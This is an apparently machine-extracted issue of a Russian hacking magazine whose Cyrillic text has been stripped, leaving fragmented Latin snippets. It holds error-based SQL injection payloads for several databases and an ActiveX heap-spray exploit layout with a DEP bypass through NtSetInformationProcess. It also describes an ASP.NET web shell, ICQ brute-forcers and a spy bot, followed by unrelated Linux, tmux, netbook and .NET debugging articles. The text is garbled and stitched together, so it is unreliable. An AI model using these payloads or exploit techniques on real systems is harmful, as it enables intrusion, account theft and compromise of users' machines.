MSSQL: /?param=1
and(1)=convert(int,@@version)--
chr(58)||(select+rawtohex(login||c
hr(58)||chr(58)||password)from(sel
ect+login,password,rownum+rnum+fro
m+users+a)where+rnum=1)||chr(62)))
from dual)--
SQL , ,
:
Sybase: /?param=1
and(1)=convert(int,@@version)-MySQL>=4.1<5.0: /?param=(1)
and(select 1 from(select count
(*),concat(version(),floor(ran
d(0)*2))x from TABLE_NAME group
by x)a)-
/?param=1 and row(1,1)>(select co
unt(*),concat(version(),0x3a,floor
(rand()*2))x from (select 1 union
select 2)a group by x limit 1)--
MySQL>=5.0: /?param=(1)and(select
1 from(select count(*),concat(v
ersion(),floor(rand(0)*2))x from
information_schema.tables group
by x)a)--
admin::P@ssw0rd
SQL>
,
error-based
blind SQL Injection :
PostgreSQL, MSSQL, Sybase,
MySQL >=4.1 Oracle >=9.0.
http-, :
PostgreSQL: /?param=1
and(1)=cast(version() as
numeric)--
,
- .
, ,
SQL .
.
, z !
Digital Security, dookie@inbox.ru
,
,
.
DEP
HARDWARE-DEP
,
DEP.
,
. DEP
, ,
.
ActiveX
IE6/IE7,
QuickSoft EasyMail Object
,
. ,
SubmitToExpress() 256
, ESI,
SEH.
cccc260ccccAAAAffffBBBBfffffffff
fffffffffffffffffffffffDDDD
ESI = AAAA
RET = BBBB
SEH = DDDD
,
heap-spray
SEH CALL [ESI+CC]
.
, ,
DEP (Data Execution Prevention),
, .
ActiveX, DEP,
, ASLR (Address space
layout randomization), ,
.
.
,
DEP , ,
.
, DEP ,
Microsoft,
NX/XD (,
AMD NX, Intel XD)
. , ,
.
- , EIP
,
(, ,
). ,
DEP
NX/DX Windows c (>= Windows XP SP2).
Microsoft ,
software-DEP.
. , ,
/ .
SEH .
SafeSEH,
DEP.
ACCESS VIOLATION
, DEP?
? , , DEP.
,
. BIOS
,
. Intel Core2
Duo , . , ,
software-DEP
( NX/XD ,
DEP
,
E Access.
DEP IS DEAD
DX
/noexecute=OptOut
Windows Server 2003 SP1. DEP
,
.
/noexecute=AlwaysOn DEP
, .
/noexecute=AlwaysOff DEP (
).
.
SysInternals Process Explorer
.
software-DEP OptOut, IE7 . ,
, SEH
, ,
,
.
.
, ,
CALL . ,
SEH
.
, ( ), CALL
[ESI+CC] ,
software-DEP. ,
, ,
,
SEH- (
heap-spray.
, software-DEP,
, hardware-DEP
( NX/
XD). , , SEH
,
. ,
, NOP
Access
violation when executing [0D0D0D0D]. , ,
JavaScript heap-spray,
.
,
,
DEP. ,
ret2libc.
, .
, ,
, ,
, WinExec. ,
WinExec
! ,
,
,
-, ,
/ ,
/
cmd.exe ( ). ,
.
-. , ,
- . 2005
DEP .
,
VirtualAlloc() .
, ,
,
( , ),
,
. memcpy(),
.
memcpy(), ,
.
, ,
, .
IN PVOID ProcessInformation,
//
DEP ,
0x0000002
IN ULONG
ProcessInformationLength
// (0x4) 4
);
DEP
! , ?
Skape Skywing
ntdll.dll:
Address1:
cmp al,0x1 ; EAX=1 ?
Process Explorer
DEP
VirtualProtect(). , ,
, VirtualProtect()
(
, 0x000040 RWX)
. .
VirtualProtect(
IN
LPVOID lpAddress,
// 0x0D0D0D0D
IN
SIZE_T dwSize,
// 0x1
IN
DWORD flNewProtect,
// - 0x40
IN
PDWORD lpflOldProtect
// , ,
( ),
0x05050505
);
VirtualProtect
. Windows
API DEP? Windows
XP SP3 ( )
API SetProcessDEPolicy(),
- DEP. , -,
. .
SetProcessDEPolicy()
NtSetInformationProcess():
NtSetInformationProcess
(
IN HANDLE ProcessHandle,
// , 0xff
IN PROCESS_INFORMATION_CLASS
ProcessInformationClass,
// 0x22
DEP -
push eax ;
0x2
push 0x22 ; 0x22
push 0xff ; 0xff (-1)
call NtSetInformationProcess
; ,
; DEP
jmp
LdrpCheckNXCompatibility +
0x5c ; ...
. . .
pop esi
leave ;
ret
0x4 ; 4
, ,
( AL )
DEP ,
. ,
,
LEAVE ,
, , ESP = EBP. ,
EAX 1. ,
,
1. , , , AL
, ntdll.dll:
. . .
Address2
mov
al,0x1
ret
0x4
retn 8. :
(Ctrl+S):
al,1
retn 0x4
Address2.
Address1 :
cmp
push
pop
al,0x1
0x2
esi
FIGHT!
.
,
EBP 0x4646464646 ,
(BBBB). DEP,
EBP 0x2:
mov
, ,
. ,
ESI. , ,
, CMP
[ESI+180],1. :
xor ebx, ebx ;
push -1
cmp [ESI+],EBX ; 0
CALL [ESI+CC], .
, ,
ESI+CC 0. ,
0, ret
:
call emsmtp.026c6232 ;
xor eax,eax ;
pop edi ;
, :
cccc260ccccAAAAffffBBBBCCCCXXXXX
XXX100XXXXXXXXXXX
AAAA=0x05050505
BBBB=Address2
CCCC=Address1
X=0x0D
cccc260ccccAAAAffffBBBBffffffffC
CCCXXXXXXXX100XXXXXXXXXXX
pop esi
pop ebx
leave
;
retn 0x8
;
(AAAA)
,
,
, NOP .
ESI 0x05050505, 0 ,
,
BBBB CCCC, BBBB
[ebp-0x4],esi
, ,
, , leave NtSetInformationProcess!
,
(BBBB ),
,
. , ActiveX
ASCII .
0x7C, ActiveX ? 0x3F.
,
0x7C. DEP,
ActiveX. ,
CALL [ESI+CC] ,
.
, , ESI+CC
,
, .
,
! CALL .
.
: CALL
DEP,
, . CALL
AL , ,
je LdrpCheckNXCompatibility+0x1a
DEP.
, CALL,
ActiveX,
MultiByteToWideChar(). , Z
. ? ,
,
je. Z=1,
, . ,
CMP AL,1,
2 , , PUSH 2.
, je
DEP. ,
. :
cccc260ccccAAAAffffBBBB
AAAA = 0x05050505 ,
Address1
BBBB = 0x0D0D0D0D ,
, ,
Address1 . , 0x7C91CD26.
ntdll.dll.
, ,
, DEP.
,
, .
0x0D0D0D0D ,
,
, ,
CALL[ESI+CC] (0x050505D1) ,
, 0x267C91CD.
, : 36 .
36 ,
. 4 . ,
,
( ,
). ,
,
NtSetInformationProcess
DEP
, ,
0xXXYY0000. ,
0xXXYY0024 (
+ 4 ).
0x4, +0xCC
, 0xD1.
0x3
0x05050508.
,
little-endian .
(
DVD).
DEP
,
.
,
,
, DEP. , ,
, Z
CALL ,
,
,
ret2libc .
(ASLR),
VirtualProtect
NtSetInformationProcess. .
, IE8 DEP .
, IE8
DEP (
SetProcessDEPPolicy).
DEP-
ret2libc,
NtSetInformationProcess
. , ,
,
BlackHat 2010 DC,
(Dionysus Blazakis) IE8 ASLR( ) DEP. ActionScript Java,
.
JIT-spray,
z
icq 884888
X-TOOLS
: ProxFetch
: *NIX/WIN
: X1MACHINE
:).
K-Shell
, ASP.NET
, IIS.
K-Shell
, PHP:
K-Shell
(, ,
, ..). ,
,
,
ProxFetch x1machine.com.
, ProxFetch
,
,
,
ip . :
;
c++,
;
;
;
;
GeoIP;
;
-;
TOR;
.
ProxFetch
x1machine.com/?p=72.
: K-SHELL
: WINDOWS 2000/2003/XP/VISTA/7
: KIKICOCO
(md5);
( CMD.NET,
W32, WSH, SQLServer);
( );
(Server IP, Machine Name, Network
Name, User Name ,
OS Version, System Time, IIS,
, ,
, );
/;
;
;
IIS;
;
event ;
(, , ,
, , ,
, );
.
,
.
: ICQ EXAMBOT
: WINDOWS 2000/2003/XP/VISTA/7
: WWW.NAKODIM.RU
-?
ICQ Exambot
nakodim.ru.
icq-,
-
.
,
5000 (1200 ICQ).
,
.
,
( .NET Framework 2.0).
! :)
(
:),
Dr.TRO, Perl.
:
perl brute.pl <threads> <proxy
change time> <pause> <anticaptcha
key> <accounts file> <passwords
file> <proxy file> <nobad> <spliter>
:
<threads> ;
<proxy change time>
,
;
<pause>
;
<anticaptcha key> ;
<accounts file>
;
<passwords file>
;
<proxy file> ;
<nobad> ;
<spliter>
.
!
AntiCaptcha.
pm, .
: [ WEB ] BRUTE
FORCER V1.1
: WINDOWS 2000/2003/XP/VISTA/7
: [X26]VOLAND
, basic-
-?
- 1' or 1=1/*,
. [ Web ] Brute Forcer
[x26]VOLAND
:).
:
POST;
GET;
basic-
HEAD;
FTP;
( 1 1000 );
REQUEST ;
Cookies;
( );
3 (1 , , 1 );
plain HTML
input , ;
(,
, ).
-
,
- .
<form>.
action url
URL. method
/ .
<form>
<input> ( ).
, ,
.
<input> name.
login, nickname,
username .., .
name
.
.
( name value) request-.
<form> <input>
type=submit, . Submit-.
- <input>
name, .
. ,
.
, (
/
, ).
(
), ,
, ,
(
).
( ) ,
. Enjoy!
,
forum.antichat.ru/thread109600.html.:)
/
ICQ SPY BOT.
,
.
:
;
;
;
;
;
( 800 );
ICQ ;
;
IP ;
;
;
;
PID;
;
;
;
url;
;
;
.
,
.
,
,
:). z
Mifrill maria.nefedova@glc.ru
2010
-
2009 , , lan- .
,
, ,
.
,
CAROLINACON
: 19 21
: ,
: www.carolinacon.org
CarolinaCon
2005 ,
.
,
,
Microsoft, Intel
. CarolinaCon
2600.
?
. ,
,
. , ,
, , ,
- . ,
, 2010
.
,
.
:
Linux ?,
, , ,
OMG! !!!.
,
, .
CANSECWEST
: 20 26
: ,
: cansecwest.com
,
?
,
,
CanSecWest.
, ,
, IT-.
, , , .
(, ) ,
, ,
. ,
.
: 8 9
: -,
: developers.sun.ru/techdays2010
Sun, .
, ,
Java,
.
: 19 22 ; 29
2
: , ; ,
: www.hackinthebox.org
. ,
, ,
IT-
.
,
HITB, , . , , ,
.
HITB Dubai,
, , , .
: .
,
.
, -,
McAfee;
TEHTRI-Security
;
. ,
.
BLACKHAT EUROPE
: 12 15
: ,
: www.blackhat.com
BlackHat, , ,
, .
BlackHat
.
13 . ,
BlackHat Europe.
,
,
: SAP ,
Adobe Flash, PDF Adobe Reader ,
,
ZIP, 7ZIP, RAR, CAB.
:
,
Fortinet Inc., Invisible
Things Lab,
Trustwave Spiderlabs, Context
Information Security .
:
HOPE.
, ,
, .
,
,
, ,
. , ,
BlackHat ,
-,
IEEE 802.11, TCP/IP .
NOTACON
: 15 18
: ,
: www.notacon.org
Notacon
,
, .
, , 2003
, ,
,
.
, ,
, ,
; , ,
,
,
. ,
Notacon
, , , .
, , ,
.
BLACKHAT USA
: 24 29
: -,
: www.blackhat.com
BlackHat
, - -. ,
,
, ,
.
, IT-,
.
, BlackHat 2010 ,
,
,
, BlackHat
2010 .
HACKERS ON PLANET
EARTH (HOPE)
: 16 18
: -,
: thenexthope.org
HITB'09
!
Hacker Quarterly,
.
HOPE
,
. ,
:
HOPE: Hackers On Planet Earth, Beyond HOPE,
H2K, H2K2, The Fifth HOPE, HOPE Number
Six, 2008
The Last HOPE.
08
2010- The
Next HOPE,
.
, ,
, - ( ).
-, Cult of the Dead Cow.
, ,
,
. ,
,
.
ASSEMBLY
:
: (),
: www.assembly.org
. Assembly
-
1992 .
, Assembly (
DEFCON , , ..
.
HUMAN .
9 .
) -
5000 .
,
-
, ,
.
2007 Assembly
: Assembly Winter,
, ,
( -);
Assembly Summer
,
. - ,
.
Assemly Winter10, , ,
, - . Asembly Summer
,
.
, , ,
.
DEFCON
: 30 1
: -,
: www.defcon.org
-,
IT-. DEFCON
,
.
,
18
, :).
DEFCON
,
HACKERS
ON PLANET EARTH.
,
, ,
,
. DEFCON 18
:
,
15
, , ; IT
,
,
, DEFCON!;
, ,
, , ,
, , p2p .
,
.
CHAOS CONSTRUCTIONS
:
: - (),
: cc.org.ru
Chaos Constructions, CC,
,
, CC
1995 .
, , -,
,
, , . Chaos
Constructions
,
, -,
.
\ , ,
,
,
. Chaos Constructions, , ,
,
.
CC10 ,
, ,
, . z
UNIXOID
hatchet maks.hatchet@yandex.ru
, ,
, , ,
. ,
( )
, .
,
.
,
(, , ). ,
:
. , 4 2 ,
,
.
,
( ).
.
,
.
Linux
/proc /sys. ,
,
. ,
:
$ cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
,
:
cpufreq 11
, ,
. :
$ ls -1 /sys/devices/system/cpu/cpu0/cpufreq
affected_cpus ,
cpuinfo_cur_freq
cpuinfo_max_freq
cpuinfo_min_freq
scaling_available_frequencies
cpufreq-info,
: , ,
.. :
$ sudo cpufreq-set -g powersave
'-f':
cpufreq-info
scaling_available_governors
scaling_driver
scaling_governor
scaling_max_freq
,
scaling_min_freq
,
scaling_setspeed
,
Linux,
:
1.
,
. ,
,
cpufreq.
:
acpi-cpufreq ACPI (P-States Driver)
p4-clockmod Pentium 4
speedstep-centrino Pentium M
speedstep-ich Pentium III-M, P4-M, ICH2/
ICH3/ICH4
speedstep-smi Pentium III-M, 440 BX/ZX/MX
powernow-k6 AMD K6
powernow-k7 AMD Athlon
powernow-k8 AMD Opteron, Athlon 64,
Athlon64X2, Turion 64
cpufreq-nforce2 nVidia nForce2 ( FSB
PCI/AGP)
,
.
2.
, -
. Linux
:
1. performance ,
,
.
2. ondemand .
3. conservative ondemand,
( ,
).
4. powersave .
5. userspace ,
.
,
:
GOVERNOR /etc/init.d/
cpufrequtils (
ondemand).
,
.
,
.
fancontrol
lm-sensors.
,
lm-sensors, ,
sensors-detect.
<Enter>.
Do you want to add these lines automatically?,
yes,
modprobe.
:
# modprobe cpufreq_ondemand
scaling_governor:
# echo ondemand > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
.
ondemand ,
, ,
, . ,
. ,
userspace,
scaling_setspeed:
# echo 1000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_setspeed
scaling_
available_frequencies. ,
, cpufrequtils,
. Debian/Ubuntu:
$ sudo apt-get install cpufrequtils
, sensors.
,
.
CPU Fan CPU Temp,
.
( 4000 ),
( 60 ).
. ,
fancontrol,
, .
,
pwmconfig,
.
pwmconfig <Enter>
. ,
Select fan output to configure, or other
action:, 1
.
,
,
UNIXOID
hdparm:
. ,
,
.
, ,
.
,
<Enter>,
.
pwmconfig
, , , fancontrol:
$ sudo /etc/init.d/fancontrol start
, fancontrol
(
),
. ,
Acer Aspire One
acerhdf (www.piie.
net/?section=acerhdf).
Sony Vaio Fan Silencer (www.taimila.
com/fansilencer.php). ,
.
, , -
,
, .
:
,
,
( 3D-).
,
.
. nVidia,
Linux nvclock (www.
linuxhardware.org/nvclock).
,
,
.
'-i'
-- Sensor info --,
.
nvclock '-f' '-F',
:
$ sudo nvclock -f -F 60
10 100
10. ,
.
, .
, ,
. , ,
.
?
, .
,
,
.
,
.
,
. :
,
, .
,
.
,
,
, .
,
.
nvclock , ,
, /etc/fstab ( swap
).
, ext4,
,
.
, , Linux
,
. ext2, ext4, reiserfs, , ,
FAT, .
,
defrag (http://ck.kolivas.org/apps/defrag)
Shake (http://vleu.net/shake). .
(shake-0.99.1-Linux.sh),
.
, , .
Debian Ubuntu
apt,
http://vleu.
net/apt.
,
:
$ sudo shake -pvv ///
5
15
.
.
.
.
( )
. ,
,
.
-
.
, Linux
,
.
/proc/sys/vm:
$ ls -1 /proc/sys/vm
laptop_mode (120)
-
(
,
?).
dirty_writeback_centisecs (12000)
.
dirty_expire_centisecs (12000)
.
dirty_ratio (10) , (
).
dirty_background_ratio (1) ,
.
, .
sensors lm-sensors
,
.
, ,
,
,
.
hdparm. , :
$ sudo hdparm -B 1 -S 12 /dev/sda
'-B 1'
. 254, 1
pwmconfig
127 ,
.
'-S 12' , .
255 : 1 240
5 , 0 .
Automatic Acoustic Management,
,
(, , 10%).
-
hdparm. :
$ sudo hdparm -M 128 /dev/sda
, 254.
,
/,
,
(, 128 , 254 , ,
, ,
).
,
,
, . ,
, ,
.z
UNIXOID
zobni n@gmail.com
GNU Screen
tmux
tmux
?
, , SSH-.
,
,
.
.
, .
<Ctrl+Z>,
,
, jobs. SSH-
, .
?
Screen
. ,
Screen , SSH-
. ,
screen, .
less /
var/log/messages, <Ctrl+A C>, , top,
irssi ..
<Ctrl+A P>
.
SSH-.
Screen .
<Ctrl+A D>,
Screen 'r',
. ,
-,
,
. ,
.
, Screen.
,
mutt alpine
.
, X- ,
GTK- QT- .
, ,
, ,
(, ()
, ratpoison, ion3 dwm,
Screen).
?
Screen. .
-, ,
,
. -, Screen
,
..,
,
.
, ,
,
. ~/.screenrc
:
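$ vi ~/.screenrc
# Disable the startup message
startup_message off
# Enable utf8
defutf8 on
# Use the visual bell (instead of the audible one)
vbell on
# Scrollback buffer size, in lines
defscrollback 1000
# Detach the session automatically when the connection drops
autodetach on
# Start a Login-shell
shell -$SHELL
# Use xterm's own scrollback (no alternate screen)
termcapinfo xterm* ti@:te@
# Set window titles dynamically
shelltitle '$ |sh'
# Status line
hardstatus alwayslastline "%{+b wk} %c $LOGNAME@%H %=[ %w ] "
# <Esc> opens a root window via su
bind \033 screen -ln -t root 9 su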
.
. Screen
.
:
.
, , Screen
,
shelltitle. '$ |sh',
,
,
'$ ' (
), sh (
).
.
, ~/.bashrc:
case $TERM in
    screen)
        export PROMPT_COMMAND='echo -n -e "\033k\033\\"'
        ;;
esac
,
(hardstatus). Screen ,
.
:
12:18 user@hostname [ 0 sh 1 mc 2* irssi ]
UNIXOID
Screen
tmux
_@_,
.
.
Screen
, ,
(
PS1). screen,
.
<Esc>
root-.
Screen
, .
- ,
, .
.
, ,
Screen
<Ctrl+A> (<C-a>
Screen),
- .
<C-a c>
,
.
:
Screen
C-a 0..9
0..9
C-a "
C-a n
C-a p
C-a c
C-a k
C-a C-a
C-a S
C-a |
C-a Tab
C-a z
C-a d
screen
C-a M
C-a ?
C-a :
Screen
TMUX:
set -g lock-after-time 1800
set-password -c '$2a$06$7LpuTSfDjcz.KD3a9mdEuuJmC.zEq6RBqHWMjdv9/qqzrfWedUBHe'
bind L lock-server
. , ,
watch. Screen
. <C-a C-[>
.
<C-a C-]> .
<C-a h> Screen ,
less. :
hardcopy._. ,
bind .
, ""
<C-a Space>
:
bind ' ' windowlist -b
, <C-a S>
:
bind S split
:
bind m screen -t mail mutt
<C-a m>
mail,
mutt.
Screen:
screen -t mail 0 mutt
screen -t irc 1 irssi
screen -t google 2 elinks http://www.google.com
~/.screenrc
Screen,
mutt, irssi
elinks.
SCREEN'
4.6 OpenBSD Screen
tmux ,
,
, . , :
$ tmux last-window
:
$ tmux new-window
Screen
tmux ,
,
bind,
,
tmux
.
tmux
. set-option
, set-window-option
.
(set setw),
'-g'.
, , , ,
. :
$ tmux show-options
$ tmux show-window-options
WARNING
warning
tmux
15 (
),
,
.
man-. , :
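$ vi ~/.tmux.conf
# Status bar background colour
set -g status-bg white
# Right side of the status bar: user@host and uptime
set -g status-right '#(echo $USER)@#H #(uptime | cut -d "," -f 1)'
# vi-style key bindings
set -g status-keys vi
setw -g mode-keys vi
# Scrollback history size, in lines
set -g history-limit 1000
# Use <C-a> as the prefix key
set -g prefix C-a
unbind C-b
# <C-a C-a> switches to the last window
bind C-a last-window
# <C-a M> turns on activity monitoring for the window
bind M setw monitor-activity on
# <C-a /> opens top in a new window
bind / neww 'exec top'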
INFO
info
<C-b t> tmux
, .
.
$ tmux list-commands
UNIXOID
ADEPT ADEPTG@GMAIL.COM
:
status-left status-right. , .
Screen, :
#()
( )
#H
#S
#T
## #
, ,
. @, ,
echo $USER
( ), uptime | cut -d "," -f 1 ( )
#H.
bind new-window (neww).
, , . , tmux
attach, , ,
mutt, irssi:
tmux
2010- UNIX
, 3D-.
, UNIX
, .
(
).
elinks (http://elinks.or.cz).
, ,
, , JavaScript, , ,
, (Perl, Lua, Guile).
alpine (www.washington.edu/alpine). .
pine. ,
.
mutt, , ,
.
IM- centerim (www.centerim.org/index.php/Main_Page).
IM- centericq. .
: ICQ, Yahoo!, AIM TOC, IRC, MSN, Gadu-Gadu
Jabber. ,
.
Twitter- ttytter (www.floodgap.com/software/ttytter). Twitter-, Perl.
( ,
).
sdcv (http://sdcv.sourceforge.net).
StarDict.
.
new -d
neww -d mutt
neww -d irssi
new-session,
. .
'-d' , tmux
.
tmux. Screen,
<C-b ">, <C-b o>, <C-b>
. <C-b Alt-Up> <C-b Alt-Down>.
, <C-b Space>. ,
, , ,
. ,
.
centerim
DVD
dvd
screen tmux,
HTTP://WWW
links
http://cli-apps.org
, GNU Screen
tmux, .
,
,
, . z
UNIXOID
Adept adeptg@gmail.com
Linux
-
, Linux,
( Windows 7
Starter, ). ,
! - /SSD 4 .
LET'S MORTAL KOMBAT BEGIN
(
Asus Eee
PC 701) , ,
,
,
.
- .
-
x86- , Gentoo Atom'
. ,
:
,
. 10"
Gnome/KDE -
, 7"
.
- Chromium OS
.
,
,
OpenOffice :).
, , , , ,
? , :
Ubuntu Netbook Remix
;
Lenovo ideapad s10-2
:
MOBLIN VIRTUALBOX
, Moblin ,
VirtualBox. :
1. img iso.
2. , IO APIC PAE/NX. .
3. , Moblin ( Live-
, ).
4. <F1> GRUB. , quiet vga=current, 3,
runlevel.
5. /etc/inittab,
/usr/sbin/moblin-dm /usr/bin/startx.
Hint: Moblin 2.1 VirtualBox 3.1 :).
: 10.1", 1024x600;
: Intel Atom N270 1.6 ;
: Intel GMA950;
: 1 ;
: 160 ;
: 10/100 / Ethernet, 802.11b/g, WiMAX.
, ,
.
Ubuntu Netbook Remix (UNR)
Ubuntu Canonical
( , Ubuntu Moblin, ).
Ubuntu -
,
, . 10.04
, Gimp Tomboy.
, .
: Intel
Atom, 512 4
, , .
-
3 : ,
MOBLIN
Moblin , , .
Ubuntu:
Moblin . ppa (https://launchpad.net/~moblin/+archive/ppa). , ppa .
Debian:
Moblin testing unstable. ( tasksel) , . :
# apt-get install gtk2-engines-moblin moblin-cursor-theme moblin-icon-theme \
    moblin-sound-theme moblin-menus moblin-panel-applications \
    moblin-panel-media moblin-panel-myzone moblin-panel-pasteboard \
    moblin-panel-people moblin-panel-status moblin-session mutter-moblin
Fedora:
# yum groupinstall "Moblin Desktop Environment"
Mandriva:
# urpmi task-moblin
OpenSUSE:
Moblin 2.1 OpenSUSE 11.2
.
.
42 (
), 15,
4 ( VIA,
Intel GMA 500). , 4
,
community :).
, ,
9.10. 2010,
Ubuntu,
10.04.
, Ubuntu,
. :
Desktop Switcher,
Gnome'
Netbook Remix.
UNR Launcher
Gnome.
. (Favorites),
.
Go Home
UNR Launcher.
,
UNR
Launcher.
Window Picker
Gnome, ,
.
,
.
Maximus
. .
UNR , , . :
Easypeasy , UNR
( .. : Skype, , ),
.
1.5, Ubuntu 9.04.
CHROMIUM OS
Chrome OS (, Chromium OS)
Ubuntu 9.10, :
1. : <Ctrl+Alt+T>
2. :
$ sudo mkdir -p /var/cache/apt/archives/partial
$ sudo mkdir -p /var/log/apt
3. rw:
$ sudo mount -o remount,rw /
4. sources.list:
$ echo "deb http://mirror.yandex.ru/ubuntu karmic main restricted" | \
sudo tee -a /etc/apt/sources.list
5. :
$ sudo apt-get update
,
Chromium OS
Eeebuntu NBR UNR,
Asus Eee PC (
). . NBR (Netbook Remix),
Standart ( Gnome),
Base (
) LXDE (, LXDE
).
3,
Ubuntu 9.04. 4 Debian
Unstable.
Leeenux Easypeasy ,
. 7" (Asus Eee
PC 701),
1,2 . 31 2.0 (
Easypeasy 1.5),
3.0, UNR
9.10.
Moblin' ,
-.
(, twitter last.fm).
12 :
MyZone , ,
;
Status
;
People ;
Internet , Firefox 3.5. -
;
Media / . -
;
Pasteboard ;
Applications (
) ;
Zones (
<Alt+Tab>);
4 , , Bluetooth .
, Moblin
-, . ,
:
ext4,
2.6.31;
GUI-
(Connman)
, IP- ( DHCP);
-
;
/
;
.
mc! :)
,
Google. ,
( Chromium OS www.chromium.org/chromium-os)
Live CD/USB.
LiveUSB Chromium OS Zero (http://chromeos.hexxeh.net).
, , ,
Chrome OS Google Google Google.
. ? !
Google Docs. ? Google Mail! IM-?
Google Talk! , (
Chromium OS Ubuntu)!
INFO
info
MID (Mobile Internet
Device)
(
4-7 ),
,
,
-.
SSSE3
(Supplemental
Streaming SIMD
Extension 3)
,
Intel'
.
SSE3,
32
,
.
,
Chromium
OS
,
.
Google,
Chrome
OS (
x86, ARM
)
2010.
Moblin
:
Google
.
.
Chromium OS
Google ,
7 .
,
.
Chrome OS
, -
.
// .
(
:) ) (, ),
.
, /
.
Google- ( , ,
).
(, Google Chrome)
Google Mail.
Chrome (
).
,
. , ,
,
,
:). Chromium
OS 19 : ,
Google ,
Yahoo! Mail Hotmail.
(, , )
. <F8>,
.
, :
<Ctrl+Alt+T> ,
!
, Chromium
OS ,
( ,
Ubuntu). wiki- 15
.
, -, ,
Google , .
(, CAD- -
?)
.
Moblin
Jolicloud
, Google.
. -
$4.2
. Ubuntu,
- Debian - JoliCloud, -
Ubuntu Netbook Remix Chromium OS. ,
, , -, Google.
:
ISO- ( LiveCD).
JoliCloud , ,
Ubuntu.
Windows ( XP
7).
, . /
. !
( Intel GMA500 VIA
C7M). , JoliCloud 98%
. 75 /, 7
3 . 98%
:).
.
JoliCloud-. :
.
, Web- Mozilla Prism.
JoliCloud.
.
JoliCloud (- )
, .
-,
(
, ).
, , JoliCloud-,
UNR:
;
Jolicloud.
4 , , , .
Ubuntu Netbook Remix Ubuntu,
(
-- Ubuntu One).
, .
,
.
Moblin ,
. -
IRC. ,
(. Moblin
).
Google Chrome (Chromium) ,
. .
Google Groups (chromium-os-*)
IRC. , .
Jolicloud .
,
. ,
, ,
Windows , Linux-.
(www.techreviewonlineforum.com/jolicloud-forum-f17.html), Facebook
( 5000 ) twitter (http://twitter.com/jolicloud).
Linux . z
DVD
dvd
.
HTTP://WWW
links
:
www.ubuntu.com
moblin.org
www.chromium.org
www.jolicloud.com
:
www.phoronix.com/scan.php?page=article&item=chromium_moblin_benchmarks
CODING
c0n Difesa (condifesa@gmail.com) http://defec.ru
.NET REMOTING:
GRID-
(), , - .
,
.
. ,
,
.
.
,
:
, , ,
. -
,
,
. ,
( ,
).
.
, , ,
.
, ,
.
. , ,
.
.
- ( . grid ,
) , , (), . ,
.
,
, ,
.
, ,
.
, (,
)
, .
, .
,
. ,
,
, . , ( ) ,
.
, ;).
,
.
(dedicated servers)
;). ,
, MD5, -,
, ,
.
.
? !
-
, .NET .
, .
, .NET
,
. , .NET Remoting. ,
- ,
C#, , , (,
, ..). ,
, , .
, ,
( -).
- ,
, ,
. :
, . , . ,
,
.NET Remoting .
( 39993),
, .
:
,
, ,
. , ,
, :
, , , .
:
.
Microsoft
: , ,
. :
, , ,
.
, , -.
(remoting)
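// Namespaces used: System.Runtime.Remoting, System.Runtime.Remoting.Channels,
// System.Runtime.Remoting.Channels.Tcp
// Create a TCP server channel listening on port 39993
TcpServerChannel channel = new TcpServerChannel(39993);
ChannelServices.RegisterChannel(channel);
// Register the remotely accessible type
RemotingConfiguration.RegisterWellKnownServiceType(
    typeof(Bot),                      // type of the remote object
    "Bot",                            // URI of the object
    WellKnownObjectMode.SingleCall);  // a new instance serves each call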
INFO
info
:
hash.txt
,
distribute.exe
client.exe.
DVD
dvd
Microsoft
Visual Studio 2008.
URI .
( , TCP)
, .
(localhost,
IP- ) , Bot ,
. URI
,
( , 39993).
ALEKSANDR-EHKKERT@RAMBLER.RU
: , Bot ,
System.MarshalByRefObject:
public class Bot:MarshalByRefObject
{
...
}
,
, .
, :
Bot brain = new Bot();
brain , ,
,
, .
, ( )
. ,
, , (
, ), .
,
.
():
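// Namespace used for Registry: Microsoft.Win32
// Number of logical processors
int Core = (Int32)System.Environment.ProcessorCount;
// CPU clock frequency in MHz, read from the registry
int Takt = (Int32)Registry.GetValue(
    @"HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0",
    "~MHz", 0);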
,
,
() :
int RangeValue = Core * Takt * 9;
//
,
(
) .
:
1. ;
2. ;
3.
.
() .
1-3;
4.
.
, , , .
,
,
. , :
.
.
, .
,
. ,
, ,
abcde39# .
( !zxcv4M
1234567). n- ,
1.
;).
Bot. GetJob(int
<__>).
,
brain GetJob:
brain.GetJob(" ");
, , , .
,
.
:
,
,
.
,
,
-
,
a.k.a John the Ripper.
/pen-/security-
, . ,
,
,
, ? : -
,
( ;)) ,
.
:
,
. , MD5-.
,
! z
stannic.man@gmail.com
.NET
.NET FRAMEWORK
, .NET-
, , ,
.NET Framework
Win32-.
.NET- , ,
PE-.
, PE-
, runtime-
CLR. , .NET
CLR. .NET ,
mscoree.dll
_CoreExeMain. ,
, .NET .
,
.NET
_CoreExeMain .
, .NET- ,
,
.NET-
.
,
, .
.NET
Framework?
-,
. ,
.NET .
CLR ,
.
.
(reflection).
.NET Framework
, ( CLR) .
, -,
,
MSIL-, .
.
Visual Studio ,
.
,
Visual Studio.NET,
IntelliSense.
IntelliSense , ,
. Visual Studio.NET
, .
CLR
, , .
,
.
.
,
, , .
,
,
.
, .
(
)?
?
, .
:
TypeDef ,
MethodDef, PropertyDef
EventDef, ,
.
MethodDef
, . FieldDef,
ParamDef, PropertyDef EventDef, ,
, , , ,
.
, AssemblyRef,
,
, ModuleRef
CorDbg
INFO
info
ILDASM
(call stack)
microsoft.visual.studio.dll!DesignerHost.Add
IL-
DVD
dvd
,
.NET
Framework.
HTTP://WWW
links
blogs.msdn.com/jmstall
,
geekswithblogs.net/.netonmymind/archive/2006/03/14/72262.aspx
WinDBG+SOS, adplus.vbs,
\ adplus.vbs www.microsoft.com/whdc/devtools/debugging/default.mspx.
.NET-
PE-, , .
, TypeRef
MemberRef. ,
, ,
.
, .NET, ILDASM ( )
Ctrl+M.
, , .NET-,
,
. , Donut
CLR- .NET . CLR COM-, .NET IMetaDataDispenser
IMetaDataDispenserEx, IMetaDataEmit IMetaDataAssemblyEmit.
.NET-
ILDASM, Microsoft
IL. , Visual
Studio.
, IT :
www.xakep.ru/magazine/xs/066/058/1.asp .NET
: (
!)
www.xakep.ru/magazine/xa/108/118/1.asp
:
Microsoft
, .
: CorDbg , GUI- DbgCLR. ,
DbgCLR Visual
Studio.
CorDbg
, .NET Framework.
CorDbg
IL- dis[assemble] , set.
,
reg.
CorDbg
MSDN.
(, !)
Mdbg, Visual Studio,
CorDbg.
DBGCLR
, Visual Studio,
, .
,
.
